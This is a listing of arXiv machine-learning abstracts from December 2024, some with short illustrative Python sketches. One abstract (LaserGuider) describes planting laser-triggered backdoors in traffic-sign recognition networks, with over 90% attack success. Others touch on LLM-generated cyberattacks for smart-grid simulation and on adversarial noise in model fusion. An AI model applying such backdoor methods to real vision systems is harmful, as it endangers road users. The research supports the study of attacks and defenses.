In molecular dynamics (MD) simulations, transitions between states are often rare events due to energy barriers that exceed the thermal temperature. Because of their infrequent occurrence and the huge number of degrees of freedom in molecular systems, understanding the physical properties that drive rare events is immensely difficult. A common approach to this problem is to propose a collective variable (CV) that describes this process by a simplified representation. However, choosing CVs is not easy, as it often relies on physical intuition. Machine learning (ML) techniques provide a promising approach for effectively extracting optimal CVs from MD data. Here, we provide a note on a recent unsupervised ML method called spectral map, which constructs CVs by maximizing the timescale separation between slow and fast variables in the system.
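The following is a minimal sketch of the spectral-map idea under simplifying assumptions (a linear CV and random search instead of gradient-based training): build a Markov transition matrix from a Gaussian kernel on the CV values, and pick the CV weights that maximize the eigenvalue gap separating slow from fast modes.

```python
import numpy as np

rng = np.random.default_rng(0)

def spectral_gap(z, eps=0.5):
    # Row-stochastic Markov matrix from a Gaussian kernel on CV values z,
    # then the gap between the slowest non-trivial eigenvalues.
    K = np.exp(-(z[:, None] - z[None, :]) ** 2 / (2 * eps ** 2))
    M = K / K.sum(axis=1, keepdims=True)
    lam = np.sort(np.abs(np.linalg.eigvals(M)))[::-1]
    return lam[1] - lam[2]   # timescale separation (lam[0] = 1)

# Toy trajectory: one metastable coordinate, two fast noise coordinates.
slow = np.r_[rng.normal(-2, 0.3, 100), rng.normal(2, 0.3, 100)]
X = np.column_stack([slow, rng.normal(0, 1, (200, 2))])

# Spectral map idea: search for CV weights maximizing the eigenvalue gap.
best_w, best_gap = None, -np.inf
for _ in range(100):
    w = rng.normal(size=3)
    w /= np.linalg.norm(w)
    gap = spectral_gap(X @ w)
    if gap > best_gap:
        best_w, best_gap = w, gap
print(best_w, best_gap)   # weights concentrate on the slow coordinate
```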
Updated: 2024-12-05 09:45:21
Domain: physics.chem-ph,cs.LG,physics.bio-ph
Deep-Unrolling Multidimensional Harmonic Retrieval Algorithms on Neuromorphic Hardware
This paper explores the potential of conversion-based neuromorphic algorithms for highly accurate and energy-efficient single-snapshot multidimensional harmonic retrieval (MHR). By casting the MHR problem as a sparse recovery problem, we devise a deep-unrolling-based Structured Learned Iterative Shrinkage and Thresholding (S-LISTA) algorithm to solve it efficiently using complex-valued convolutional neural networks with complex-valued activations, which are trained using a supervised regression objective. Afterward, a novel method for converting the complex-valued convolutional layers and activations into spiking neural networks (SNNs) is developed. At the heart of this method lies the recently proposed Few Spikes (FS) conversion, which is extended by modifying the neuron model's parameters and internal dynamics to account for the inherent coupling between real and imaginary parts in complex-valued computations. Finally, the converted SNNs are mapped onto the SpiNNaker2 neuromorphic board, and a comparison in terms of estimation accuracy and power efficiency between the original CNNs deployed on an NVIDIA Jetson Xavier and the SNNs is conducted. The measurement results show that the converted SNNs achieve almost five-fold power efficiency, at a moderate performance loss, compared to the original CNNs.
Updated: 2024-12-05 09:41:33
Domain: eess.SP,cs.AI,cs.AR,cs.NE
Scaling Laws for Task-Optimized Models of the Primate Visual Ventral Stream
When trained on large-scale object classification datasets, certain artificial neural network models begin to approximate core object recognition (COR) behaviors and neural response patterns in the primate visual ventral stream (VVS). While recent machine learning advances suggest that scaling model size, dataset size, and compute resources improve task performance, the impact of scaling on brain alignment remains unclear. In this study, we explore scaling laws for modeling the primate VVS by systematically evaluating over 600 models trained under controlled conditions on benchmarks spanning V1, V2, V4, IT and COR behaviors. We observe that while behavioral alignment continues to scale with larger models, neural alignment saturates. This observation remains true across model architectures and training datasets, even though models with stronger inductive bias and datasets with higher-quality images are more compute-efficient. Increased scaling is especially beneficial for higher-level visual areas, where small models trained on few samples exhibit only poor alignment. Finally, we develop a scaling recipe, indicating that a greater proportion of compute should be allocated to data samples over model size. Our results suggest that while scaling alone might suffice for alignment with human core object recognition behavior, it will not yield improved models of the brain's visual ventral stream with current architectures and datasets, highlighting the need for novel strategies in building brain-like models.
Updated: 2024-12-05 09:39:07
Domain: cs.LG,cs.CV,q-bio.NC
Tight PAC-Bayesian Risk Certificates for Contrastive Learning
Contrastive representation learning is a modern paradigm for learning representations of unlabeled data via augmentations -- precisely, contrastive models learn to embed semantically similar pairs of samples (positive pairs) closer than independently drawn samples (negative samples). In spite of its empirical success and widespread use in foundation models, statistical theory for contrastive learning remains less explored. Recent works have developed generalization error bounds for contrastive losses, but the resulting risk certificates are either vacuous (certificates based on Rademacher complexity or $f$-divergence) or require strong assumptions about samples that are unreasonable in practice. The present paper develops non-vacuous PAC-Bayesian risk certificates for contrastive representation learning, considering the practical considerations of the popular SimCLR framework. Notably, we take into account that SimCLR reuses positive pairs of augmented data as negative samples for other data, thereby inducing strong dependence and making classical PAC or PAC-Bayesian bounds inapplicable. We further refine existing bounds on the downstream classification loss by incorporating SimCLR-specific factors, including data augmentation and temperature scaling, and derive risk certificates for the contrastive zero-one risk. The resulting bounds for contrastive loss and downstream prediction are much tighter than those of previous risk certificates, as demonstrated by experiments on CIFAR-10.
Updated: 2024-12-05 09:26:26
Domain: stat.ML,cs.LG
LoRA-Ensemble: Efficient Uncertainty Modelling for Self-attention Networks
Numerous crucial tasks in real-world decision-making rely on machine learning algorithms with calibrated uncertainty estimates. However, modern methods often yield overconfident and uncalibrated predictions. Various approaches involve training an ensemble of separate models to quantify the uncertainty related to the model itself, known as epistemic uncertainty. In an explicit implementation, the ensemble approach has high computational cost and high memory requirements. This particular challenge is evident in state-of-the-art neural networks such as transformers, where even a single network is already demanding in terms of compute and memory. Consequently, efforts are made to emulate the ensemble model without actually instantiating separate ensemble members, referred to as implicit ensembling. We introduce LoRA-Ensemble, a parameter-efficient deep ensemble method for self-attention networks, which is based on Low-Rank Adaptation (LoRA). Initially developed for efficient LLM fine-tuning, we extend LoRA to an implicit ensembling approach. By employing a single pre-trained self-attention network with weights shared across all members, we train member-specific low-rank matrices for the attention projections. Our method exhibits superior calibration compared to explicit ensembles and achieves similar or better accuracy across various prediction tasks and datasets.
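A minimal PyTorch sketch of the core idea (not the authors' implementation): a frozen, shared projection plus per-member low-rank adapters, with all ensemble members evaluated in one batched forward pass.

```python
import torch
import torch.nn as nn

class LoRAEnsembleLinear(nn.Module):
    """A frozen, shared projection plus per-member low-rank adapters.
    The forward pass evaluates all ensemble members in one batched call."""
    def __init__(self, d_in, d_out, n_members=4, rank=8, alpha=16.0):
        super().__init__()
        self.base = nn.Linear(d_in, d_out)
        self.base.weight.requires_grad_(False)  # shared pre-trained weights stay frozen
        self.base.bias.requires_grad_(False)
        self.A = nn.Parameter(torch.randn(n_members, d_in, rank) * 0.01)
        self.B = nn.Parameter(torch.zeros(n_members, rank, d_out))
        self.scale = alpha / rank

    def forward(self, x):
        # x: (batch, d_in) -> (n_members, batch, d_out)
        shared = self.base(x)                           # identical for every member
        delta = torch.einsum("bi,mir,mro->mbo", x, self.A, self.B)
        return shared.unsqueeze(0) + self.scale * delta

layer = LoRAEnsembleLinear(64, 64, n_members=4, rank=8)
out = layer(torch.randn(32, 64))
print(out.shape)               # torch.Size([4, 32, 64])
print(out.var(dim=0).mean())   # member disagreement; zero at init since B = 0
```

In an attention block, the same wrapper would replace the query, key, and value projections, so the ensemble shares one backbone while each member carries only the small A and B matrices.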
Updated: 2024-12-05 09:23:13
Domain: cs.LG
Blind Underwater Image Restoration using Co-Operational Regressor Networks
The exploration of underwater environments is essential for applications such as biological research, archaeology, and infrastructure maintenance. However, underwater imaging is challenging due to the water's unique properties, including scattering, absorption, color distortion, and reduced visibility. To address such visual degradations, a variety of approaches have been proposed, ranging from basic signal processing methods to deep learning models; however, none of them has proven to be consistently successful. In this paper, we propose a novel machine learning model, Co-Operational Regressor Networks (CoRe-Nets), designed to achieve the best possible underwater image restoration. A CoRe-Net consists of two co-operating networks: the Apprentice Regressor (AR), responsible for image transformation, and the Master Regressor (MR), which evaluates the Peak Signal-to-Noise Ratio (PSNR) of the images generated by the AR and feeds it back to the AR. CoRe-Nets are built on Self-Organized Operational Neural Networks (Self-ONNs), which offer a superior learning capability by modulating nonlinearity in kernel transformations. The effectiveness of the proposed model is demonstrated on the benchmark Large Scale Underwater Image (LSUI) dataset. Leveraging the joint learning capabilities of the two cooperating networks, the proposed model achieves state-of-the-art restoration performance with significantly reduced computational complexity, and often produces results that can even surpass the visual quality of the ground truth with a two-pass application. Our results and the optimized PyTorch implementation of the proposed approach are now publicly shared on GitHub.
Updated: 2024-12-05 09:15:21
Domain: cs.CV,cs.LG,eess.IV
LaserGuider: A Laser Based Physical Backdoor Attack against Deep Neural Networks
Backdoor attacks embed hidden associations between triggers and targets in deep neural networks (DNNs), causing them to predict the target when a trigger is present while maintaining normal behavior otherwise. Physical backdoor attacks, which use physical objects as triggers, are feasible but lack remote control, temporal stealthiness, flexibility, and mobility. To overcome these limitations, in this work, we propose a new type of backdoor triggers utilizing lasers that feature long-distance transmission and instant-imaging properties. Based on the laser-based backdoor triggers, we present a physical backdoor attack, called LaserGuider, which possesses remote control ability and achieves high temporal stealthiness, flexibility, and mobility. We also introduce a systematic approach to optimize laser parameters for improving attack effectiveness. Our evaluation on traffic sign recognition DNNs, critical in autonomous vehicles, demonstrates that LaserGuider with three different laser-based triggers achieves over 90% attack success rate with negligible impact on normal inputs. Additionally, we release LaserMark, the first dataset of real world traffic signs stamped with physical laser spots, to support further research in backdoor attacks and defenses.
Updated: 2024-12-05 09:14:50
Domain: cs.CR,cs.AI,cs.CV,cs.LG,eess.IV
How well behaved is finite dimensional Diffusion Maps?
Under a set of assumptions on a family of submanifolds $\subset {\mathbb R}^D$, we derive a series of geometric properties that remain valid after finite-dimensional and almost isometric Diffusion Maps (DM), including almost uniform density, finite polynomial approximation and local reach. Leveraging these properties, we establish a rigorous bound of $O\left((\frac{\log n}{n})^{\frac{1}{8d+16}}\right)$ on the embedding error introduced by the DM algorithm. These results offer a solid theoretical foundation for understanding the performance and reliability of DM in practical applications.
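For reference, the finite-dimensional DM embedding analyzed here is the standard construction; a minimal NumPy sketch follows (parameter choices are illustrative).

```python
import numpy as np

def diffusion_maps(X, dim=2, eps=1.0, t=1):
    """Classical Diffusion Maps: Gaussian affinities, density
    normalization (alpha = 1), Markov normalization, and embedding by
    the leading non-trivial eigenvectors scaled by eigenvalue powers."""
    d2 = ((X[:, None, :] - X[None, :, :]) ** 2).sum(-1)
    K = np.exp(-d2 / eps)
    q = K.sum(axis=1)
    K = K / np.outer(q, q)                 # remove sampling-density bias
    P = K / K.sum(axis=1, keepdims=True)   # row-stochastic Markov matrix
    vals, vecs = np.linalg.eig(P)
    order = np.argsort(-vals.real)
    vals, vecs = vals.real[order], vecs.real[:, order]
    # Skip the trivial (constant, eigenvalue 1) component.
    return (vals[1:dim + 1] ** t) * vecs[:, 1:dim + 1]

# Noisy circle in R^3: the embedding should recover its intrinsic geometry.
rng = np.random.default_rng(1)
theta = rng.uniform(0, 2 * np.pi, 300)
X = np.column_stack([np.cos(theta), np.sin(theta), 0.1 * rng.normal(size=300)])
Y = diffusion_maps(X, dim=2, eps=0.3)
print(Y.shape)  # (300, 2)
```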
Updated: 2024-12-05 09:12:25
Domain: stat.ML,cs.LG,math.ST,stat.TH
MTMT: Consolidating Multiple Thinking Modes to Form a Thought Tree for Strengthening LLM
Large language models (LLMs) have shown limitations in tasks requiring complex logical reasoning and multi-step problem-solving. To address these challenges, researchers have employed carefully designed prompts and flowcharts, simulating human cognitive processes to enhance LLM performance, such as the Chain of Thought approach. In this paper, we introduce MTMT (Multi-thinking Modes Tree), a novel method that interacts with LLMs to construct a thought tree, simulating various advanced cognitive processes, including but not limited to association, counterfactual thinking, task decomposition, and comparison. By breaking down the original complex task into simpler sub-questions, MTMT facilitates easier problem-solving for LLMs, enabling more effective utilization of the latent knowledge within LLMs. We evaluate the performance of MTMT under different parameter configurations, using GPT-4o mini as the base model. Our results demonstrate that integrating multiple modes of thinking significantly enhances the ability of LLMs to handle complex tasks.
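A schematic sketch of the thought-tree construction; `llm` is a hypothetical completion function standing in for the underlying model, and the mode prompts are illustrative rather than the paper's.

```python
def llm(prompt: str) -> str:
    """Hypothetical LLM call; replace with any chat-completion client."""
    return f"<answer to: {prompt[:40]}...>"

THINKING_MODES = {
    "decompose": "Break this task into simpler sub-questions: {q}",
    "associate": "List related facts or concepts that bear on: {q}",
    "counterfactual": "What would change if key assumptions were false? {q}",
    "compare": "Compare the candidate approaches for: {q}",
}

def build_thought_tree(question: str, depth: int = 2) -> dict:
    """Expand a question into a tree whose branches are different
    thinking modes, then answer the leaves and consolidate bottom-up."""
    if depth == 0:
        return {"q": question, "answer": llm(question)}
    children = {mode: build_thought_tree(llm(tmpl.format(q=question)), depth - 1)
                for mode, tmpl in THINKING_MODES.items()}
    summary = llm("Consolidate these branch conclusions into one answer: "
                  + "; ".join(c["answer"] for c in children.values()))
    return {"q": question, "children": children, "answer": summary}

tree = build_thought_tree("Why does ice float on water?", depth=1)
print(tree["answer"])
```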
Updated: 2024-12-05 09:05:30
Domain: cs.CL,cs.AI
PDNNet: PDN-Aware GNN-CNN Heterogeneous Network for Dynamic IR Drop Prediction
IR drop on the power delivery network (PDN) is closely related to the PDN's configuration and cell current consumption. As integrated circuit (IC) designs grow larger, dynamic IR drop simulation becomes computationally unaffordable, and machine learning based IR drop prediction has been explored as a promising solution. Although CNN-based methods have been adapted to the IR drop prediction task in several works, the shortcoming of overlooking the PDN configuration is non-negligible. In this paper, we consider not only how to properly represent the cell-PDN relation, but also how to model IR drop following its physical nature in the feature aggregation procedure. Thus, we propose a novel graph structure, PDNGraph, to unify the representations of the PDN structure and the fine-grained cell-PDN relation. We further propose a dual-branch heterogeneous network, PDNNet, incorporating two parallel GNN-CNN branches to favorably capture the above features during the learning process. Several key designs are presented to make the dynamic IR drop prediction highly effective and interpretable. We are the first to apply a graph structure to a deep-learning-based dynamic IR drop prediction method. Experiments show that PDNNet outperforms the state-of-the-art CNN-based methods and achieves a 545x speedup compared to the commercial tool, which demonstrates the superiority of our method.
Updated: 2024-12-05 09:02:11
Domain: cs.LG,cs.AI
Safe and Efficient Online Convex Optimization with Linear Budget Constraints and Partial Feedback
This paper studies online convex optimization with unknown linear budget constraints, where only the gradient information of the objective and the bandit feedback of constraint functions are observed. We propose a safe and efficient Lyapunov-optimization algorithm (SELO) that can achieve an $O(\sqrt{T})$ regret and zero cumulative constraint violation. The result also implies SELO achieves $O(\sqrt{T})$ regret when the budget is hard and not allowed to be violated. The proposed algorithm is computationally efficient as it resembles a primal-dual algorithm where the primal problem is an unconstrained, strongly convex and smooth problem, and the dual problem has a simple gradient-type update. The algorithm and theory are further justified in a simulated application of energy-efficient task processing in distributed data centers.
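For intuition, here is a generic drift-plus-penalty loop of the kind SELO builds on (a toy sketch, not the paper's algorithm): a virtual queue accumulates the bandit-style constraint feedback and penalizes the primal gradient step.

```python
import numpy as np

rng = np.random.default_rng(0)

# Toy instance: minimize f(x) = ||x - x_star||^2 subject to a'x <= b,
# with exact objective gradients but only noisy (bandit-style) values
# of the constraint function.
x_star = np.array([1.0, 2.0])
a, b = np.array([1.0, 1.0]), 2.0

x = np.zeros(2)
Q = 0.0                                     # virtual queue (dual surrogate)
for t in range(1, 5001):
    eta = 1.0 / np.sqrt(t)                  # diminishing primal step size
    grad_f = 2.0 * (x - x_star)
    g_hat = a @ x - b + 0.1 * rng.normal()  # noisy constraint feedback
    x = x - eta * (grad_f + Q * a)          # Lyapunov-penalized primal step
    Q = max(Q + g_hat, 0.0)                 # queue tracks cumulative violation

print(x, a @ x - b)  # near the constrained optimum (0.5, 1.5), a'x - b ~ 0
```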
Updated: 2024-12-05 08:58:41
Domain: math.OC,cs.LG
Exploring Fully Convolutional Networks for the Segmentation of Hyperspectral Imaging Applied to Advanced Driver Assistance Systems
Advanced Driver Assistance Systems (ADAS) are designed with the main purpose of increasing the safety and comfort of vehicle occupants. Most current computer vision-based ADAS perform detection and tracking tasks quite successfully under regular conditions, but are not completely reliable, particularly under adverse weather and changing lighting conditions, nor in complex situations with many overlapping objects. In this work we explore the use of hyperspectral imaging (HSI) in ADAS on the assumption that the distinct near infrared (NIR) spectral reflectances of different materials can help to better separate the objects in a driving scene. In particular, this paper describes some experimental results of the application of fully convolutional networks (FCN) to the image segmentation of HSI for ADAS applications. More specifically, our aim is to investigate to what extent the spatial features codified by convolutional filters can be helpful to improve the performance of HSI segmentation systems. With that aim, we use the HSI-Drive v1.1 dataset, which provides a set of labelled images recorded in real driving conditions with a small-size snapshot NIR-HSI camera. Finally, we analyze the implementability of such a HSI segmentation system by prototyping the developed FCN model together with the necessary hyperspectral cube preprocessing stage and characterizing its performance on an MPSoC.
Updated: 2024-12-05 08:58:25
Domain: cs.CV,cs.AI,cs.LG,eess.IV
R-MTLLMF: Resilient Multi-Task Large Language Model Fusion at the Wireless Edge
Multi-task large language models (MTLLMs) are important for many applications at the wireless edge, where users demand specialized models to handle multiple tasks efficiently. However, training MTLLMs is complex and exhaustive, particularly when tasks are subject to change. Recently, the concept of model fusion via task vectors has emerged as an efficient approach for combining fine-tuning parameters to produce an MTLLM. In this paper, the problem of enabling edge users to collaboratively craft such MTLLMs via task vectors is studied, under the assumption of worst-case adversarial attacks. To this end, first the influence of adversarial noise on multi-task model fusion is investigated and a relationship between the so-called weight disentanglement error and the mean squared error (MSE) is derived. Using hypothesis testing, it is directly shown that the MSE increases interference between task vectors, thereby rendering model fusion ineffective. Then, a novel resilient MTLLM fusion (R-MTLLMF) is proposed, which leverages insights about the LLM architecture and fine-tuning process to safeguard task vector aggregation under adversarial noise by realigning the MTLLM. The proposed R-MTLLMF is then compared under both worst-case and ideal transmission scenarios to study the impact of the wireless channel. Extensive model fusion experiments with vision LLMs demonstrate R-MTLLMF's effectiveness, achieving close-to-baseline performance across eight different tasks in ideal noise scenarios and significantly outperforming unprotected model fusion in worst-case scenarios. The results further advocate for additional physical layer protection for a holistic approach to resilience, from both a wireless and LLM perspective.
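The task-vector fusion that R-MTLLMF safeguards can be sketched in a few lines (standard task arithmetic over state dicts; the paper's realignment step under adversarial noise is not reproduced here).

```python
import torch

def task_vector(base: dict, finetuned: dict) -> dict:
    # A task vector is the elementwise difference between fine-tuned
    # and pre-trained weights (task arithmetic, Ilharco et al.).
    return {k: finetuned[k] - base[k] for k in base}

def fuse(base: dict, vectors: list, lam: float = 0.3) -> dict:
    # Multi-task fusion: add the scaled sum of task vectors to the base.
    return {k: base[k] + lam * sum(v[k] for v in vectors) for k in base}

# Toy "models" as state dicts.
base = {"w": torch.zeros(4)}
ft_a = {"w": torch.tensor([1.0, 0.0, 0.0, 0.0])}   # task A expert
ft_b = {"w": torch.tensor([0.0, 1.0, 0.0, 0.0])}   # task B expert

mtllm = fuse(base, [task_vector(base, ft_a), task_vector(base, ft_b)])
print(mtllm["w"])  # tensor([0.3000, 0.3000, 0.0000, 0.0000])
```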
Updated: 2024-12-05 08:57:30
Domain: eess.SP,cs.AI,cs.LG
AI-based Attacker Models for Enhancing Multi-Stage Cyberattack Simulations in Smart Grids Using Co-Simulation Environments
The transition to smart grids has increased the vulnerability of electrical power systems to advanced cyber threats. To safeguard these systems, comprehensive security measures, including preventive, detective, and reactive strategies, are necessary. As part of the critical infrastructure, securing these systems is a major research focus, particularly against cyberattacks. Many methods are developed to detect anomalies and intrusions and assess the damage potential of attacks. However, these methods require large amounts of data, which are often limited or private due to security concerns. We propose a co-simulation framework that employs an autonomous agent to execute modular cyberattacks within a configurable environment, enabling reproducible and adaptable data generation. The impact of virtual attacks is compared to those in a physical lab targeting real smart grids. We also investigate the use of large language models for automating attack generation, though current models on consumer hardware are unreliable. Our approach offers a flexible, versatile source for data generation, aiding in faster prototyping and reducing development resources and time.
Updated: 2024-12-05 08:56:38
Domain: cs.CR
Continual Low-Rank Scaled Dot-product Attention
Transformers are widely used for their ability to capture data relations in sequence processing, with great success for a wide range of static tasks. However, the computational and memory footprint of their main component, i.e., the Scaled Dot-product Attention, is commonly overlooked. This makes their adoption in applications involving stream data processing with constraints in response latency, computational and memory resources infeasible. Some works have proposed methods to lower the computational cost of transformers, i.e. low-rank approximations, sparsity in attention, and efficient formulations for Continual Inference. In this paper, we introduce a new formulation of the Scaled Dot-product Attention based on the Nyström approximation that is suitable for Continual Inference. In experiments on Online Audio Classification and Online Action Detection tasks, the proposed Continual Scaled Dot-product Attention can lower the number of operations by up to three orders of magnitude compared to the original Transformers while retaining the predictive performance of competing models.
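For context, here is a minimal NumPy sketch of Nyström-approximated scaled dot-product attention with mean-pooled landmarks (the non-continual building block; the paper's continual-inference recursion is not reproduced here).

```python
import numpy as np

def softmax(x, axis=-1):
    e = np.exp(x - x.max(axis=axis, keepdims=True))
    return e / e.sum(axis=axis, keepdims=True)

def nystrom_attention(Q, K, V, m=8):
    """Nystrom approximation of softmax(QK^T/sqrt(d))V using m landmark
    queries/keys obtained by segment-mean pooling (n must divide by m)."""
    n, d = Q.shape
    Ql = Q.reshape(m, n // m, d).mean(axis=1)    # landmark queries
    Kl = K.reshape(m, n // m, d).mean(axis=1)    # landmark keys
    s = np.sqrt(d)
    F1 = softmax(Q @ Kl.T / s)                   # (n, m)
    F2 = np.linalg.pinv(softmax(Ql @ Kl.T / s))  # (m, m)
    F3 = softmax(Ql @ K.T / s)                   # (m, n)
    return F1 @ F2 @ (F3 @ V)                    # O(n m d) instead of O(n^2 d)

rng = np.random.default_rng(0)
n, d = 64, 16
Q, K, V = rng.normal(size=(3, n, d))
exact = softmax(Q @ K.T / np.sqrt(d)) @ V
approx = nystrom_attention(Q, K, V, m=8)
print(np.abs(exact - approx).mean())  # modest approximation error
```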
Updated: 2024-12-05 08:49:02
Domain: cs.CV,cs.LG
Improving Fine-Grained Control via Aggregation of Multiple Diffusion Models
While many diffusion models perform well when controlling for a particular aspect such as style, character, or interaction, they struggle with fine-grained control due to dataset limitations and intricate model architecture design. This paper introduces a novel algorithm, Aggregation of Multiple Diffusion Models (AMDM), which synthesizes features from multiple diffusion models into a specified model, activating specific features for fine-grained control. Experimental results demonstrate that AMDM significantly improves fine-grained control without training, proving its effectiveness. Additionally, it reveals that diffusion models initially focus on features such as position, attributes, and style, with later stages improving generation quality and consistency. AMDM offers a new perspective for tackling the challenges of fine-grained conditional control generation in diffusion models: We can fully utilize existing or develop new conditional diffusion models that control specific aspects, and then aggregate them using the AMDM algorithm. This eliminates the need for constructing complex datasets, designing intricate model architectures, and incurring high training costs. Code is available at: https://github.com/Hammour-steak/AMDM.
Updated: 2024-12-05 08:44:53
Domain: cs.CV,cs.LG
Digital Twin for Evaluating Detective Countermeasures in Smart Grid Cybersecurity
As the integration of digital technologies and communication systems continues within distribution grids, new avenues emerge to tackle energy transition challenges. Nevertheless, this deeper technological immersion amplifies the necessity for resilience against threats, encompassing both systemic outages and targeted cyberattacks. To ensure the robustness and safeguarding of vital infrastructure, a thorough examination of potential smart grid vulnerabilities and subsequent countermeasure development is essential. This study delves into the potential of digital twins, replicating a smart grid's cyber-physical laboratory environment, thereby enabling focused cybersecurity assessments. Merging the nuances of communication network emulation and power network simulation, we introduce a flexible, comprehensive digital twin model equipped for hardware-in-the-loop evaluations. Through this innovative framework, we not only verify and refine security countermeasures but also underscore their role in maintaining grid stability and trustworthiness.
Updated: 2024-12-05 08:41:08
Domain: cs.CR
A Data-Driven Framework for Discovering Fractional Differential Equations in Complex Systems
In complex physical systems, conventional differential equations often fall short in capturing non-local and memory effects, as they are limited to local dynamics and integer-order interactions. This study introduces a stepwise data-driven framework for discovering fractional differential equations (FDEs) directly from data. FDEs, known for their capacity to model non-local dynamics with fewer parameters than integer-order derivatives, can represent complex systems with long-range interactions. Our framework applies deep neural networks as surrogate models for denoising and reconstructing sparse and noisy observations while using Gaussian-Jacobi quadrature to handle the challenges posed by singularities in fractional derivatives. To optimize both the sparse coefficients and fractional order, we employ an alternating optimization approach that combines sparse regression with global optimization techniques. We validate the framework across various datasets, including synthetic anomalous diffusion data, experimental data on the creep behavior of frozen soils, and single-particle trajectories modeled by Lévy motion. Results demonstrate the framework's robustness in identifying the structure of FDEs across diverse noise levels and its capacity to capture integer-order dynamics, offering a flexible approach for modeling memory effects in complex systems.
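A simplified sketch of the discovery loop follows, with a Grünwald-Letnikov discretization standing in for the paper's Gaussian-Jacobi quadrature and neural denoising: it grid-searches the fractional order and hard-thresholds library coefficients.

```python
import numpy as np

def gl_coeffs(alpha, n):
    # Grunwald-Letnikov binomial coefficients c_k = (-1)^k C(alpha, k).
    c = np.ones(n)
    for k in range(1, n):
        c[k] = c[k - 1] * (1 - (alpha + 1) / k)
    return c

def gl_derivative(f, alpha, dt):
    # Order-alpha fractional derivative of a uniformly sampled signal.
    c = gl_coeffs(alpha, len(f))
    return np.array([c[:i + 1] @ f[i::-1] for i in range(len(f))]) / dt ** alpha

def fit_fde(x, dt, alphas=np.linspace(0.3, 1.0, 15), thresh=0.05):
    """Grid-search the fractional order; for each candidate, regress
    D^alpha x onto a small library [1, x, x^2] and hard-threshold tiny
    coefficients (a crude STRidge-style sparsification)."""
    library = np.column_stack([np.ones_like(x), x, x ** 2])
    best = None
    for a in alphas:
        lhs = gl_derivative(x, a, dt)
        w, *_ = np.linalg.lstsq(library[1:], lhs[1:], rcond=None)  # skip t=0
        w[np.abs(w) < thresh] = 0.0
        res = np.linalg.norm(library[1:] @ w - lhs[1:])
        if best is None or res < best[0]:
            best = (res, a, w)
    return best

# Synthetic data from D^0.6 x = -x, stepped forward with the same scheme.
alpha_true, dt, n = 0.6, 0.01, 400
c = gl_coeffs(alpha_true, n)
x = np.zeros(n)
x[0] = 1.0
for i in range(1, n):
    hist = c[1:i + 1] @ x[i - 1::-1]
    x[i] = -hist / (1 + dt ** alpha_true)

res, a_hat, w_hat = fit_fde(x, dt)
print(a_hat, w_hat)  # recovers order ~0.6 and coefficients ~[0, -1, 0]
```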
Updated: 2024-12-05 08:38:30
Domain: physics.comp-ph,cs.AI
Demonstration Selection for In-Context Learning via Reinforcement Learning
Diversity in demonstration selection is crucial for enhancing model generalization, as it enables a broader coverage of structures and concepts. However, constructing an appropriate set of demonstrations has remained a focal point of research. This paper presents the Relevance-Diversity Enhanced Selection (RDES), an innovative approach that leverages reinforcement learning to optimize the selection of diverse reference demonstrations for text classification tasks using Large Language Models (LLMs), especially in few-shot prompting scenarios. RDES employs a Q-learning framework to dynamically identify demonstrations that maximize both diversity and relevance to the classification objective by calculating a diversity score based on label distribution among selected demonstrations. This method ensures a balanced representation of reference data, leading to improved classification accuracy. Through extensive experiments on four benchmark datasets and involving 12 closed-source and open-source LLMs, we demonstrate that RDES significantly enhances classification accuracy compared to ten established baselines. Furthermore, we investigate the incorporation of Chain-of-Thought (CoT) reasoning in the reasoning process, which further enhances the model's predictive performance. The results underscore the potential of reinforcement learning to facilitate adaptive demonstration selection and deepen the understanding of classification challenges.
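A schematic sketch of the selection loop; `evaluate_prompt` is a hypothetical stand-in for running the LLM on a validation set, and the diversity score is the normalized label-distribution entropy. The reward design below is illustrative, not the paper's.

```python
import numpy as np
from collections import Counter

rng = np.random.default_rng(0)

def diversity(selected, labels):
    # Normalized entropy of the label distribution among selected demos.
    counts = np.array(list(Counter(labels[i] for i in selected).values()),
                      dtype=float)
    p = counts / counts.sum()
    return float(-(p * np.log(p)).sum() / np.log(len(set(labels))))

def evaluate_prompt(selected):
    """Hypothetical stand-in: prompt the LLM with these demonstrations
    and return validation accuracy (here just a noisy constant)."""
    return 0.6 + 0.05 * rng.normal()

def rdes_select(labels, k=4, episodes=300, eps=0.2, lr=0.1, beta=0.5):
    Q = np.zeros(len(labels))          # one value estimate per candidate
    for _ in range(episodes):
        if rng.random() < eps:         # epsilon-greedy exploration
            sel = rng.choice(len(labels), size=k, replace=False)
        else:
            sel = np.argsort(-Q)[:k]
        reward = evaluate_prompt(sel) + beta * diversity(sel, labels)
        Q[sel] += lr * (reward - Q[sel])   # bandit-style value update
    return np.argsort(-Q)[:k]

labels = [0, 0, 0, 0, 1, 1, 1, 2, 2, 2]
print(rdes_select(labels))  # selection skews toward label-diverse demos
```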
Updated: 2024-12-05 08:33:52
Domain: cs.AI,cs.CL
Tencent Hunyuan3D-1.0: A Unified Framework for Text-to-3D and Image-to-3D Generation
While 3D generative models have greatly improved artists' workflows, the existing diffusion models for 3D generation suffer from slow generation and poor generalization. To address this issue, we propose a two-stage approach named Hunyuan3D-1.0 including a lite version and a standard version, that both support text- and image-conditioned generation. In the first stage, we employ a multi-view diffusion model that efficiently generates multi-view RGB in approximately 4 seconds. These multi-view images capture rich details of the 3D asset from different viewpoints, relaxing the tasks from single-view to multi-view reconstruction. In the second stage, we introduce a feed-forward reconstruction model that rapidly and faithfully reconstructs the 3D asset given the generated multi-view images in approximately 7 seconds. The reconstruction network learns to handle noises and inconsistency introduced by the multi-view diffusion and leverages the available information from the condition image to efficiently recover the 3D structure. Our framework involves the text-to-image model, i.e., Hunyuan-DiT, making it a unified framework to support both text- and image-conditioned 3D generation. Our standard version has 3x more parameters than our lite version and other existing models. Our Hunyuan3D-1.0 achieves an impressive balance between speed and quality, significantly reducing generation time while maintaining the quality and diversity of the produced assets.
Updated: 2024-12-05 08:29:51
Domain: cs.CV,cs.AI
Augmenting Minds or Automating Skills: The Differential Role of Human Capital in Generative AI's Impact on Creative Tasks
